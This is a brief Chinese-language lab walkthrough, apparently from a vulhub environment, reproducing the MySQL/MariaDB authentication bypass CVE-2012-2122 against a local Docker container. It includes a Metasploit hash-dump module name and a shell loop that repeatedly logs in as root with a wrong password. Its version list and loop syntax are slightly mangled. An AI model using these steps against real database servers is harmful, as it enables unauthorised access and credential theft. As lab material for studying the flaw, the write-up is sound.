漏洞简介
#:数据库的漏洞较少,大多都是基于弱口令爆破。
当连接MariaDB/MySQL时,输入的密码会与期望的正确密码比较,由于不正确的处理,会导致即便是memcmp()返回一个非零值,也会使MySQL认为两个密码是相同的。也就是说只要知道用户名,不断尝试就能够直接登入SQL数据库。
受影响版本:
• MariaDB versions from 5.1.62, 5.2.12, 5.3.6, 5.5.23 are not.
• MySQL versions from 5.1.63, 5.5.24, 5.6.6 are not.
启动环境
cd /root/vulhub/mysql/CVE-2012-2122
docker-compose up -d
环境启动后,将启动一个Mysql服务(版本:5.5.23),监听3306端口,通过正常的Mysql客户端,可以直接登录的,正确root密码是123456
漏洞复现
使用msf扫描模块
use auxiliary/scanner/mysql/mysql_authbypass_hashdump
或者直接采用下面方式:
for i in seq 1 1000
; do mysql -u root --password=bad -h 127.0.0.1 2>/dev/null; done
关闭环境
docker-compose down
参考链接:
https://www.cnblogs.com/l0nmar/p/13372091.html
https://vulhub.org/#/environments/mysql/CVE-2012-2122/